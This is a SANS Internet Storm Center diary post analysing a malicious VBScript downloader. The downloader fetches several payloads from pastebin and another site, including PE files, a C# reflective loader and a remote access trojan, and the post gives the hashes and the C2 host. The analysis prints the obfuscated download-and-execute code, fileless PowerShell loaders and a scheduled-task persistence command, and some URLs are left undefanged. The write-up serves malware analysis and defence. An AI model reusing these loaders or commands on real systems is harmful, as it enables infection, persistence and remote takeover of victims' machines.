Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Malicious Script With Multiple Payloads SANS ISC InfoSec Forums

Special Webcast: What you need to know about the crypt32.dll vulnerability. Register Now

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Malicious Script With Multiple Payloads

Pastebin.com remains a common way to download malicious data and/or scripts. A few days ago, I spotted this malicious script that got a very low score on VT: 3/57 (SHA56:45e45d2932816b14665f65ee4fc1aa7473b29031da1612d3d909f867c618d80e)[1]. The obfuscation wasn't very complex but remains quite effective. The script is just a downloader that fetches more content from pastebin.com as well as other sites.

A first payload is downloaded from pastebin.com:

Set As_wW = CreateObject("WScript.Shell")
Dim AXW
AXW1 = "pt.Shell"").Run(""powershell.exe -noexi"
AXW5 = "ng('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/'+'e8GrYbHb'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close)"
AXW2 = "t -command [Reflection.Assembly]::Load("
AXW4 = "-Object Net.WebClient).DownloadStri"
AXW0 = "cmd.exe /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject(""Wscri"
AXW3 = "[System.Convert]::FromBase64String((New"
AXW = AXW0 + AXW1 + AXW2 + AXW3 + AXW4 + AXW5
As_wW.Run AXW, vbHide

The decoded command is:

cmd.exe / c ping 127.0.0.1 -n 10 > nul & \
mshta.exe vbscript:CreateObject("Wscript.Shell").Run(""powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('hxxps://pastebin[.]com/raw/e8GrYbHb'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close)

Let's have a look at the pastie:

isc> curl -s hxxps://pastebin[.]com/raw/e8GrYbHb| head -c 100
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgB

You recognise immediately a PE file

isc> curl -s https://pastebin[.]com/raw/e8GrYbHb| base64 -d | sha256sum
8d54da80492eefcb1b688be56a18d2ea353aaa2d02b09256d5f3c9803104a1bf -

The file has a score of 17/72 on VT[2]

Then, a second payload is downloaded:

Set shell = CreateObject("WScript.Shell")
shell.Run("Powershell.exe -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''http://www.m9c.net/uploads/15615146751.jpg'').replace(''*'',''x0'')'));[<##>AppDomain<##>]::<##>('^urrentDomain'.replace('^','C'))<##>.<##>('%oad'.replace('%','L'))($sc64).'EntryPoint'<##>.<##>('in@okg'.replace('g','e').replace('@','v'))($null,$null)"),0

Let's have a look at this payload:

isc> curl -s hxxp://www.m9c[.]net/uploads/15615146751.jpg | head -c 100
    0x4D, 0x5A, 0x90, 0*0, 0*3, 0*0, 0*0, 0*0, 0*4, 0*0, 0*0, 0*0,
    0xFF, 0xFF, 0*0, 0*0, 0xB8, 0*0, 0

Again, a PE file (0x04D, 0x5A == "MZ"). It can be easily decoded with a tool like Cyberchef via a bunch of search/replace and converting from hex characters. The file is unknown on VT (SHA256:86e29714187bdfe606ca791e83f48263e590598b9f466ff5bf6a7ce99a4e54d3)

The third payload is again grabbed from pastebin:

isc> curl -s hxxps://pastebin[.]com/raw/2HpiMFUJ
<script language="VBScript">
'============Checking the system architecture=========================================
Set oShell = CreateObject ("Wscript.Shell")
Dim strArgs
strArgs = "powershell -noexit $Script = Invoke-WebRequest 'hxxps://pastebin[.]com/raw/9NQF7jy5';$ScriptBlock = [Scriptblock]::Create($Script.Content);Invoke-Command -ScriptBlock $ScriptBlock -ArgumentList ($args + @('someargument'));" oShell.Run strArgs, 0, false
self.close
</script>

And the next payload is:

isc> curl -s hxxps://pastebin[.]com/raw/9NQF7jy5$
code = @"
using System.Net;
using System.Reflection;
using System;
using System.Threading;
namespace CDTPitbull
{
    public class Cat
    {
        public void Run()
        {
            using (WebClient wc = new WebClient())
            {
               // new Thread(() =>
              //  {
                    try
                    {
                        Assembly asm = AppDomain.CurrentDomain.Load(Convert.FromBase64String(wc.DownloadString("hxxps://pastebin[.]com/raw/3qSWYxTb")));
                        MethodInfo Metinf = asm.EntryPoint;
                        object InjObj = asm.CreateInstance(Metinf.Name);
                        object[] parameters = new object[1];  // C#
                        if (Metinf.GetParameters().Length == 0)
                        {
                            parameters = null; // VB.NET
                        }
                        Metinf.Invoke(InjObj, parameters);
                    }
                    catch { return; }
              //  })
              //  { IsBackground = false }.Start();
            }
        }
    }
}
"@

Add-Type -TypeDefinition $code;
$instance = New-Object CDTPitbull.Cat;
$instance.Run();

And the last one is again a PE file:

isc> curl -s https://pastebin.com/raw/3qSWYxTb | head -c 100
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgB
isc> curl -s https://pastebin.com/raw/3qSWYxTb | base64 -d | sha256sum
55fd3697bd2bfdc519b5faf4c58055ce69ddf912b87a3bf6e92a541729a5e49f  -

This payload has a score of 24/70 on VT[3] (SHA256:55fd3697bd2bfdc519b5faf4c58055ce69ddf912b87a3bf6e92a541729a5e49f)

Persistence is achieved by creating a scheduled task:

cmd.exe /c ping 127.0.0.1 -n 30 > nul & schtasks /create /sc MINUTE /mo 200 /tn "MicrosoftWin32" /tr "mshta vbscript:CreateObject(\"Wscript.Shell").Run(\"mshta.exe hxxps://pastebin[.]com/raw/2HpiMFUJ\",0,true)(window.close)" /F

Finally, any running Excel or Word instances are killed:

Set X7W832DSA = CreateObject("WScript.Shell")
Dim ASSd712ji8asd
ASSd712ji8asd = "cmd.exe /c cd ""%ProgramFiles%""  & taskkill /f /im EXCEL.EXE & taskkill /f /im WINWORD.EXE & exit"
X7W832DSA.Run ASSd712ji8asd, vbHide

I don't know the purpose of this...

It's a RAT trying to connect to the following C2 server: bylgay[.]hopto[.]org (152[.]245[.]159[.]90)

[1] https://www.virustotal.com/gui/file/45e45d2932816b14665f65ee4fc1aa7473b29031da1612d3d909f867c618d80e/detection
[2] https://www.virustotal.com/gui/file/8d54da80492eefcb1b688be56a18d2ea353aaa2d02b09256d5f3c9803104a1bf/detection
[3] https://www.virustotal.com/gui/file/55fd3697bd2bfdc519b5faf4c58055ce69ddf912b87a3bf6e92a541729a5e49f/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Xme

499 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!